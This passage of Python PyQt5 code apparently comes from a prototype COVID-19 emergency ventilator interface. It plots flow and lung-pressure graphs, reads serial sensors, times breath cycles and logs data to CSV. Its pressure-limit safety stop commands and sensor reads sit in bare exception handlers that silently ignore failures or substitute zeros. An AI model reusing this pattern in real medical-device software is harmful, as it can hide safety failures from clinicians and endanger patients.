QtWidgets.QVBoxLayout(\r\n self.graph1_value_widget)\r\n self.graph1_value_widget_VL.setObjectName(\r\n \"graph1_value_widget_VL\")\r\n self.graph1_value = QtWidgets.QLabel(self.graph1_value_widget)\r\n\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph1_value.sizePolicy().hasHeightForWidth())\r\n self.graph1_value.setSizePolicy(sizePolicy)\r\n self.graph1_value.setMinimumSize(QtCore.QSize(200, 0))\r\n self.graph1_value.setMaximumSize(QtCore.QSize(200, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph1_value.setFont(font)\r\n self.graph1_value.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph1_value.setObjectName(\"graph1_value\")\r\n self.graph1_value_widget_VL.addWidget(self.graph1_value)\r\n self.graph1_units = QtWidgets.QLabel(self.graph1_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph1_units.sizePolicy().hasHeightForWidth())\r\n self.graph1_units.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n 
font.setWeight(75)\r\n self.graph1_units.setFont(font)\r\n self.graph1_units.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph1_units.setObjectName(\"graph1_units\")\r\n self.graph1_value_widget_VL.addWidget(self.graph1_units)\r\n self.graph1_label_widget_HL.addWidget(self.graph1_value_widget)\r\n spacerItem9 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph1_label_widget_HL.addItem(spacerItem9)\r\n self.graph1_widget_HL.addWidget(self.graph1_label_widget)\r\n spacerItem10 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph1_widget_HL.addItem(spacerItem10)\r\n self.graph1_window = QtWidgets.QWidget(self.graph1_widget)\r\n self.graph1_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph1_window.setObjectName(\"graph1_window\")\r\n self.graph1_window_HL = QtWidgets.QHBoxLayout(\r\n self.graph1_window)\r\n self.graph1_window_HL.setObjectName(\"graph1_window_HL\")\r\n\r\n self.graph1 = pg.PlotWidget()\r\n self.graph1.setObjectName(\"graph1\")\r\n self.graph1_x = [0] \r\n self.graph1_y = [0]\r\n self.graph1.setBackground((0, 0, 0, 0))\r\n pen = pg.mkPen(color=(5, 201, 133), width=3)\r\n self.graph1_data_line = self.graph1.plot(\r\n self.graph1_x, self.graph1_y, pen=pen)\r\n\r\n self.graph1_window_HL.addWidget(self.graph1)\r\n self.graph1_widget_HL.addWidget(self.graph1_window)\r\n self.centralWidget_VL.addWidget(self.graph1_widget)\r\n\r\n # Graph 2: Expiratory Flow Rate\r\n def setupGraph2(self):\r\n self.graph2_widget = QtWidgets.QWidget(self.centralWidget)\r\n self.graph2_widget.setObjectName(\"graph2_widget\")\r\n self.graph2_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph2_widget)\r\n self.graph2_widget_HL.setObjectName(\"graph2_widget_HL\")\r\n self.graph2_label_widget = QtWidgets.QWidget(\r\n self.graph2_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph2_label_widget.sizePolicy().hasHeightForWidth())\r\n self.graph2_label_widget.setSizePolicy(sizePolicy)\r\n self.graph2_label_widget.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph2_label_widget.setObjectName(\"graph2_label_widget\")\r\n self.graph2_label_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph2_label_widget)\r\n self.graph2_label_widget_HL.setObjectName(\r\n \"graph2_label_widget_HL\")\r\n spacerItem11 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph2_label_widget_HL.addItem(spacerItem11)\r\n self.graph2_label = QtWidgets.QLabel(self.graph2_label_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph2_label.sizePolicy().hasHeightForWidth())\r\n self.graph2_label.setSizePolicy(sizePolicy)\r\n self.graph2_label.setMinimumSize(QtCore.QSize(75, 0))\r\n self.graph2_label.setMaximumSize(QtCore.QSize(75, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n 
font.setWeight(60)\r\n self.graph2_label.setFont(font)\r\n self.graph2_label.setAlignment(\r\n QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)\r\n self.graph2_label.setObjectName(\"graph2_label\")\r\n self.graph2_label_widget_HL.addWidget(self.graph2_label)\r\n self.graph2_value_widget = QtWidgets.QWidget(\r\n self.graph2_label_widget)\r\n self.graph2_value_widget.setMinimumSize(QtCore.QSize(100, 0))\r\n self.graph2_value_widget.setObjectName(\"graph2_value_widget\")\r\n self.graph2_value_widget_VL = QtWidgets.QVBoxLayout(\r\n self.graph2_value_widget)\r\n self.graph2_value_widget_VL.setObjectName(\r\n \"graph2_value_widget_VL\")\r\n self.graph2_value = QtWidgets.QLabel(self.graph2_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph2_value.sizePolicy().hasHeightForWidth())\r\n self.graph2_value.setSizePolicy(sizePolicy)\r\n self.graph2_value.setMinimumSize(QtCore.QSize(200, 0))\r\n self.graph2_value.setMaximumSize(QtCore.QSize(200, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph2_value.setFont(font)\r\n self.graph2_value.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph2_value.setObjectName(\"graph2_value\")\r\n self.graph2_value_widget_VL.addWidget(self.graph2_value)\r\n self.graph2_units = QtWidgets.QLabel(self.graph2_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph2_units.sizePolicy().hasHeightForWidth())\r\n self.graph2_units.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.graph2_units.setFont(font)\r\n self.graph2_units.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph2_units.setObjectName(\"graph2_units\")\r\n self.graph2_value_widget_VL.addWidget(self.graph2_units)\r\n self.graph2_label_widget_HL.addWidget(self.graph2_value_widget)\r\n spacerItem12 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph2_label_widget_HL.addItem(spacerItem12)\r\n self.graph2_widget_HL.addWidget(self.graph2_label_widget)\r\n spacerItem13 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph2_widget_HL.addItem(spacerItem13)\r\n self.graph2_window = QtWidgets.QWidget(self.graph2_widget)\r\n self.graph2_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\\n\"\r\n \"\")\r\n self.graph2_window.setObjectName(\"graph2_window\")\r\n self.graph2_window_HL = QtWidgets.QHBoxLayout(\r\n self.graph2_window)\r\n self.graph2_window_HL.setObjectName(\"graph2_window_HL\")\r\n\r\n self.graph2 = pg.PlotWidget()\r\n self.graph2.setObjectName(\"graph2\")\r\n self.graph2_x = [0] # seed time point; the plot window grows to 100 samples\r\n self.graph2_y = [0] # matching seed data point\r\n self.graph2.setBackground((0, 0, 0, 0))\r\n pen = pg.mkPen(color=(214, 106, 199), width=3)\r\n self.graph2_data_line = self.graph2.plot(\r\n 
self.graph2_x, self.graph2_y, pen=pen)\r\n\r\n self.graph2_window_HL.addWidget(self.graph2)\r\n self.graph2_widget_HL.addWidget(self.graph2_window)\r\n self.centralWidget_VL.addWidget(self.graph2_widget)\r\n\r\n # Graph 3: Lung Pressure\r\n def setupGraph3(self):\r\n self.graph3_widget = QtWidgets.QWidget(self.centralWidget)\r\n self.graph3_widget.setObjectName(\"graph3_widget\")\r\n self.graph3_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph3_widget)\r\n self.graph3_widget_HL.setObjectName(\"graph3_widget_HL\")\r\n self.graph3_label_widget = QtWidgets.QWidget(\r\n self.graph3_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph3_label_widget.sizePolicy().hasHeightForWidth())\r\n self.graph3_label_widget.setSizePolicy(sizePolicy)\r\n self.graph3_label_widget.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph3_label_widget.setObjectName(\"graph3_label_widget\")\r\n self.graph3_label_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph3_label_widget)\r\n self.graph3_label_widget_HL.setObjectName(\r\n \"graph3_label_widget_HL\")\r\n spacerItem14 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph3_label_widget_HL.addItem(spacerItem14)\r\n self.graph3_label = QtWidgets.QLabel(self.graph3_label_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph3_label.sizePolicy().hasHeightForWidth())\r\n self.graph3_label.setSizePolicy(sizePolicy)\r\n self.graph3_label.setMinimumSize(QtCore.QSize(75, 0))\r\n self.graph3_label.setMaximumSize(QtCore.QSize(75, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph3_label.setFont(font)\r\n self.graph3_label.setAlignment(\r\n QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)\r\n self.graph3_label.setObjectName(\"graph3_label\")\r\n self.graph3_label_widget_HL.addWidget(self.graph3_label)\r\n self.graph3_value_widget = QtWidgets.QWidget(\r\n self.graph3_label_widget)\r\n self.graph3_value_widget.setMinimumSize(QtCore.QSize(100, 0))\r\n self.graph3_value_widget.setObjectName(\"graph3_value_widget\")\r\n self.graph3_value_widget_VL = QtWidgets.QVBoxLayout(\r\n self.graph3_value_widget)\r\n self.graph3_value_widget_VL.setObjectName(\r\n \"graph3_value_widget_VL\")\r\n self.graph3_value = QtWidgets.QLabel(self.graph3_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph3_value.sizePolicy().hasHeightForWidth())\r\n self.graph3_value.setSizePolicy(sizePolicy)\r\n self.graph3_value.setMinimumSize(QtCore.QSize(200, 0))\r\n self.graph3_value.setMaximumSize(QtCore.QSize(200, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph3_value.setFont(font)\r\n self.graph3_value.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | 
QtCore.Qt.AlignVCenter)\r\n self.graph3_value.setObjectName(\"graph3_value\")\r\n self.graph3_value_widget_VL.addWidget(self.graph3_value)\r\n self.graph3_units = QtWidgets.QLabel(self.graph3_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph3_units.sizePolicy().hasHeightForWidth())\r\n self.graph3_units.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.graph3_units.setFont(font)\r\n self.graph3_units.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph3_units.setObjectName(\"graph3_units\")\r\n self.graph3_value_widget_VL.addWidget(self.graph3_units)\r\n self.graph3_label_widget_HL.addWidget(self.graph3_value_widget)\r\n spacerItem15 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph3_label_widget_HL.addItem(spacerItem15)\r\n self.graph3_widget_HL.addWidget(self.graph3_label_widget)\r\n spacerItem16 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph3_widget_HL.addItem(spacerItem16)\r\n self.graph3_window = QtWidgets.QWidget(self.graph3_widget)\r\n self.graph3_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph3_window.setObjectName(\"graph3_window\")\r\n self.graph3_window_HL = QtWidgets.QHBoxLayout(\r\n self.graph3_window)\r\n self.graph3_window_HL.setObjectName(\"graph3_window_HL\")\r\n\r\n self.graph3 = pg.PlotWidget()\r\n self.graph3.setObjectName(\"graph3\")\r\n self.graph3_x = [0]\r\n self.graph3_y = [0]\r\n self.graph3.setBackground((0, 0, 0, 0))\r\n pen = pg.mkPen(color=(31, 148, 243), width=3)\r\n self.graph3_data_line = self.graph3.plot(\r\n self.graph3_x, self.graph3_y, pen=pen)\r\n\r\n self.graph3_window_HL.addWidget(self.graph3)\r\n self.graph3_widget_HL.addWidget(self.graph3_window)\r\n self.centralWidget_VL.addWidget(self.graph3_widget)\r\n\r\n ### SETUP DATA ACQUISITION SUBMETHODS ###\r\n \r\n def setupSerial(self):\r\n port1 = \"/dev/cu.wchusbserial14140\"\r\n port2 = \"/dev/cu.wchusbserial13\"\r\n\r\n # port1 = \"COM6\"\r\n # port2 = \"COM3\"\r\n try:\r\n self.ser1_sol = serial.Serial(port1, 115200, timeout=1)\r\n self.ser2 = serial.Serial(port2, 115200, timeout=1)\r\n except SerialException:\r\n print(\"Port not available\")\r\n\r\n def setupDataAcq(self):\r\n self.dataRefreshRate = 100\r\n self.ITV = 0\r\n self.ETV = 0\r\n self.PEEP = 0\r\n self.PIP = 0\r\n\r\n self.insFlowData_singleCycle = []\r\n self.expFlowData_singleCycle = []\r\n\r\n ### SETUP TIMER SUBMETHODS ###\r\n\r\n def setupDataTimer(self):\r\n self.dataRefreshRateTimer = QtCore.QTimer()\r\n self.dataRefreshRateTimer.setInterval(self.dataRefreshRate)\r\n self.dataRefreshRateTimer.timeout.connect(self.updateData)\r\n self.dataRefreshRateTimer.start()\r\n\r\n def setupBreathingTimer(self):\r\n self.E2I = 2 # E:I ratio (expiration : inspiration)\r\n self.RR = 35 # Respiratory rate (breaths/min)\r\n self.sPEEP = 2 # PEEP set point\r\n self.sPIP = 20 # PIP set point\r\n self.insPhase = True # Inspiration Phase Boolean\r\n\r\n self.breathCycleTimer = QtCore.QTimer()\r\n self.breathCycleTimer.setInterval(100)\r\n 
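# Worked example (illustrative numbers): with RR = 35 breaths/min and E2I = 2, one cycle is 60/35 = 1.71 s, split into 1/(E2I+1) = 0.57 s of inspiration and E2I/(E2I+1) = 1.14 s of expiration; updateBreathCycle re-arms the timer with whichever phase interval comes next.\r\n # The 100 ms interval above is only the first tick; the real phase intervals take over after that.\r\n 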
self.breathCycleTimer.timeout.connect(self.updateBreathCycle)\r\n self.breathCycleTimer.start()\r\n\r\n def setupClockRecordingTimer(self):\r\n self.isRecording = False\r\n self.ventTimer_s = 0\r\n self.ventTimer_data = 0\r\n self.perfCounter = 0\r\n\r\n self.updateClock()\r\n self.clockTimer = QtCore.QTimer()\r\n self.clockTimer.setInterval(1000)\r\n self.clockTimer.timeout.connect(self.updateClock)\r\n self.clockTimer.start()\r\n\r\n ### ACTION METHODS ###\r\n\r\n def E2I_button_clicked(self, isPos):\r\n self.E2I = self.E2I + ((-0.1 if not isPos and self.E2I > 0 else 0.1) * (0 if not isPos and self.E2I <= 0 else 1))\r\n _translate = QtCore.QCoreApplication.translate\r\n self.E2I = round((self.E2I),1)\r\n self.E2I_value.setText(_translate(\"MainWindow\", str(self.E2I)))\r\n\r\n def RR_button_clicked(self, isPos):\r\n self.RR = self.RR + ((-0.1 if not isPos and self.RR > 0 else 0.1) * (0 if not isPos and self.RR <= 0 else 1))\r\n _translate = QtCore.QCoreApplication.translate\r\n self.RR = round((self.RR),1)\r\n self.RR_value.setText(_translate(\"MainWindow\", str(self.RR)))\r\n\r\n def sPEEP_button_clicked(self, isPos):\r\n self.sPEEP = self.sPEEP + ((-0.1 if not isPos and self.sPEEP > 0 else 0.1) * (0 if not isPos and self.sPEEP <= 0 else 1))\r\n _translate = QtCore.QCoreApplication.translate\r\n self.sPEEP = round((self.sPEEP),1)\r\n self.sPEEP_value.setText(_translate(\"MainWindow\", str(self.sPEEP)))\r\n\r\n def sPIP_button_clicked(self, isPos):\r\n self.sPIP = self.sPIP + ((-0.1 if not isPos and self.sPIP > 0 else 0.1) * (0 if not isPos and self.sPIP <= 0 else 1))\r\n _translate = QtCore.QCoreApplication.translate\r\n self.sPIP = round((self.sPIP),1)\r\n self.sPIP_value.setText(_translate(\"MainWindow\", str(self.sPIP)))\r\n\r\n def recordButtonClicked(self):\r\n _translate = QtCore.QCoreApplication.translate\r\n self.isRecording = not self.isRecording\r\n\r\n if not self.isRecording:\r\n self.record_button.setText(_translate(\"MainWindow\", \"•\"))\r\n else:\r\n self.record_button.setText(_translate(\"MainWindow\", \"■\"))\r\n date = QDate.currentDate()\r\n dateValue = date.toString('yyyy-MM-dd')\r\n time = QTime.currentTime()\r\n timeValue = time.toString('hh-mm-ss')\r\n self.csvFilename = \"VentilatorRecording_\" + dateValue + \"_\" + timeValue + \".csv\"\r\n \r\n with open(self.csvFilename, 'w', newline='') as csvfile:\r\n dataWriter = csv.writer(csvfile)\r\n dataWriter.writerow([\"Time (s)\", \"Lung Pressure (mmHg)\", \"Inspiration Flow Rate (SLPM)\", \"Expiration Flow Rate (SLPM)\", \"FiO2 (%)\"])\r\n\r\n ### UPDATE METHODS ###\r\n\r\n def updateBreathCycle(self):\r\n _translate = QtCore.QCoreApplication.translate\r\n\r\n # NOTE!!!\r\n # E2I = E:I Ratio\r\n # RR = Respiratory Rate\r\n\r\n self.breathCycleTimer.setInterval(int(\r\n ((60/self.RR)*(self.E2I/(self.E2I+1))*1000) if self.insPhase else ((60/self.RR)*(1/(self.E2I+1))*1000))) # QTimer intervals are integer milliseconds\r\n self.insPhase = not self.insPhase\r\n\r\n if not self.insPhase and self.insFlowData_singleCycle:\r\n self.ITV = mean(self.insFlowData_singleCycle) * 1000/60 * ((60/self.RR)*(1/(self.E2I+1)))\r\n print(f'Vt: {round(self.ITV,1)} | Max: {max(self.insFlowData_singleCycle)} | Mean {round(mean(self.insFlowData_singleCycle),1)}')\r\n \r\n self.insFlowData_singleCycle.clear()\r\n self.ITV_value.setText(_translate(\r\n \"MainWindow\", str(round(self.ITV))))\r\n elif self.insPhase and self.expFlowData_singleCycle:\r\n self.ETV = mean(self.expFlowData_singleCycle) * 1000/60 * ((60/self.RR)*(self.E2I/(self.E2I+1)))\r\n self.expFlowData_singleCycle.clear()\r\n 
self.ETV_value.setText(_translate(\r\n \"MainWindow\", str(round(self.ETV))))\r\n\r\n if self.insPhase:\r\n self.PIP = sys.float_info.min\r\n try:\r\n self.ser1_sol.write(b'i') # write to port\r\n except:\r\n pass\r\n else:\r\n self.PEEP = sys.float_info.max\r\n try:\r\n self.ser1_sol.write(b'e') # write to port\r\n except:\r\n pass\r\n\r\n self.PHASE_value.setText(_translate(\r\n \"MainWindow\", \"INS\" if self.insPhase else \"EXP\"))\r\n self.PHASE_value.setStyleSheet(\"color: rgb(5, 201, 133);\" if self.insPhase else \"color: rgb(214, 106, 199);\")\r\n self.PHASE_label.setStyleSheet(\"color: rgb(5, 201, 133);\" if self.insPhase else \"color: rgb(214, 106, 199);\")\r\n\r\n def updateData(self):\r\n _translate = QtCore.QCoreApplication.translate\r\n \r\n try:\r\n self.ser1_sol.write(b'g') # write to port\r\n expFlowPoint = float(self.ser1_sol.readline().decode('Ascii').rstrip(\"\\r\\n\"))\r\n O2_value = int(self.ser1_sol.readline().decode('Ascii').rstrip(\"\\r\\n\"))\r\n except:\r\n expFlowPoint = 0\r\n O2_value = 0\r\n\r\n try:\r\n self.ser2.write(b'g') # write to port\r\n insFlowPoint = float(self.ser2.readline().decode('Ascii').rstrip(\"\\r\\n\"))\r\n lungPrVal = int(self.ser2.readline().decode('Ascii').rstrip(\"\\r\\n\"))\r\n except:\r\n insFlowPoint = 0 \r\n lungPrVal = 0\r\n\r\n insFlowPoint = round(insFlowPoint, 1)\r\n expFlowPoint = round(expFlowPoint, 1)\r\n lungPrPoint = round(((((lungPrVal/1023) * 5) - 0.5) / 4) * 51.7149, 1)\r\n\r\n elapsedTime = time.perf_counter() - self.perfCounter\r\n self.perfCounter += elapsedTime\r\n\r\n # FiO2 (%)\r\n O2_value_str = str(round(((O2_value-204.6)/818.4)*100, 1)) + \"%\"\r\n self.O2_value.setText(_translate(\"MainWindow\", O2_value_str))\r\n\r\n # Graph 1: Inspiratory Flow\r\n if len(self.graph1_x) >= 100:\r\n self.graph1_x = self.graph1_x[1:] # Remove the first x element.\r\n self.graph1_y = self.graph1_y[1:] # Remove the first y element.\r\n self.graph1_x.append(self.graph1_x[-1] + elapsedTime) # Add a new value 1 higher than the last.\r\n # insFlowPoint = randint(0, 100) # Read Ins Flow Sensor\r\n self.graph1_y.append(insFlowPoint) # Add the new value\r\n self.graph1_data_line.setData(self.graph1_x, self.graph1_y) # Update the data.\r\n self.graph1_value.setText(_translate(\"MainWindow\", str(insFlowPoint))) # Update graph1 value label\r\n if self.insPhase:\r\n self.insFlowData_singleCycle.append(insFlowPoint)\r\n\r\n # Graph 2: Expiratory Flow\r\n if len(self.graph2_x) >= 100:\r\n self.graph2_x = self.graph2_x[1:] # Remove the first x element.\r\n self.graph2_y = self.graph2_y[1:] # Remove the first y element.\r\n self.graph2_x.append(self.graph2_x[-1] + elapsedTime)\r\n # expFlowPoint = randint(0, 100) # Read Exp Flow Sensor\r\n self.graph2_y.append(expFlowPoint) # Add a new random value\r\n self.graph2_data_line.setData(self.graph2_x, self.graph2_y) # Update the data.\r\n self.graph2_value.setText(_translate(\"MainWindow\", str(expFlowPoint))) # Update graph2 value label\r\n if not self.insPhase:\r\n self.expFlowData_singleCycle.append(expFlowPoint)\r\n\r\n # Graph 3: Lung Pressure\r\n if len(self.graph3_x) >= 100:\r\n \r\n self.graph3_x = self.graph3_x[1:] # Remove the first x element.\r\n self.graph3_y = self.graph3_y[1:] # Remove the first y element.\r\n self.graph3_x.append(self.graph3_x[-1] + elapsedTime) # Add a new value 1 higher than the last.\r\n # lungPrPoint = randint(0, 20) # Read pressure sensor\r\n self.graph3_y.append(lungPrPoint) # Add a new random value\r\n self.graph3_data_line.setData(self.graph3_x, self.graph3_y) 
# Update the data.\r\n self.graph3_value.setText(_translate(\"MainWindow\", str(lungPrPoint))) # Update graph3 value label\r\n \r\n # PEEP/PIP (mmHg)\r\n if self.insPhase and lungPrPoint > self.PIP:\r\n self.PIP = lungPrPoint\r\n self.PIP_value.setText(_translate(\r\n \"MainWindow\", str(round(self.PIP)))) # Update value label\r\n # SAFETY LOGIC\r\n if self.PIP >= self.sPIP: \r\n try:\r\n self.ser1_sol.write(b's') # write to port\r\n except:\r\n pass\r\n elif not self.insPhase and lungPrPoint < self.PEEP:\r\n self.PEEP = lungPrPoint\r\n self.PEEP_value.setText(_translate(\r\n \"MainWindow\", str(round(self.PEEP)))) # Update value label\r\n # SAFETY LOGIC\r\n if self.PEEP <= self.sPEEP: \r\n try:\r\n self.ser1_sol.write(b's') # write to port\r\n except:\r\n pass\r\n\r\n \r\n # Write to file\r\n if self.isRecording:\r\n self.ventTimer_data += elapsedTime\r\n with open(self.csvFilename, 'a', newline='') as csvfile:\r\n dataWriter = csv.writer(csvfile)\r\n dataWriter.writerow([self.ventTimer_data, lungPrPoint, insFlowPoint,expFlowPoint, O2_value])\r\n\r\n def updateClock(self):\r\n _translate = QtCore.QCoreApplication.translate\r\n\r\n time = QTime.currentTime()\r\n timeValue = time.toString('hh:mm:ss')\r\n\r\n if self.isRecording:\r\n self.ventTimer_s += 1\r\n ventTimeValue = datetime.timedelta(seconds=self.ventTimer_s)\r\n self.vent_time_value.setText(_translate(\r\n \"MainWindow\", str(ventTimeValue)))\r\n else:\r\n self.vent_time_value.setText(_translate(\r\n \"MainWindow\", \"N/A\"))\r\n\r\n self.time_value.setText(_translate(\r\n \"MainWindow\", timeValue))\r\n \r\n ### INITIALIZE UI ###\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\r\n \"MainWindow\", \"Woo Lab - COVID-19 Emergency Ventilation System\"))\r\n self.ITV_value.setText(_translate(\"MainWindow\", \"0\"))\r\n self.ITV_label.setText(_translate(\"MainWindow\", \"ITV (mL)\"))\r\n self.E2I_button_pos.setText(_translate(\"MainWindow\", \"+\"))\r\n self.E2I_label.setText(_translate(\r\n \"MainWindow\", \"E:I (ratio)\"))\r\n self.E2I_value.setText(_translate(\"MainWindow\", str(self.E2I)))\r\n self.E2I_button_neg.setText(_translate(\"MainWindow\", \"-\"))\r\n self.ETV_value.setText(_translate(\"MainWindow\", \"0\"))\r\n self.ETV_label.setText(_translate(\"MainWindow\", \"ETV (mL)\"))\r\n self.RR_button_neg.setText(_translate(\"MainWindow\", \"-\"))\r\n self.RR_button_pos.setText(_translate(\"MainWindow\", \"+\"))\r\n self.RR_label.setText(_translate(\"MainWindow\", \"RR (BPM)\"))\r\n self.RR_value.setText(_translate(\"MainWindow\", str(self.RR)))\r\n self.PEEP_value.setText(_translate(\"MainWindow\", \"5.2\"))\r\n self.PEEP_label.setText(_translate(\"MainWindow\", \"PEEP (mmHg)\"))\r\n self.sPEEP_value.setText(_translate(\"MainWindow\", \"2.0\"))\r\n self.sPEEP_button_neg.setText(_translate(\"MainWindow\", \"-\"))\r\n self.sPEEP_button_pos.setText(_translate(\"MainWindow\", \"+\"))\r\n self.sPEEP_label.setText(_translate(\"MainWindow\", \"Set PEEP (mmHg)\"))\r\n self.O2_value.setText(_translate(\"MainWindow\", \"28.3%\"))\r\n self.O2_label.setText(_translate(\"MainWindow\", \"FiO2\"))\r\n self.PIP_value.setText(_translate(\"MainWindow\", \"12.5\"))\r\n self.PIP_label.setText(_translate(\"MainWindow\", \"Peak Pr (mmHg)\"))\r\n self.sPIP_value.setText(_translate(\"MainWindow\", \"20.0\"))\r\n self.sPIP_button_neg.setText(_translate(\"MainWindow\", \"-\"))\r\n self.sPIP_button_pos.setText(_translate(\"MainWindow\", \"+\"))\r\n 
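        # Note: QtCore.QCoreApplication.translate("MainWindow", s) returns s unchanged
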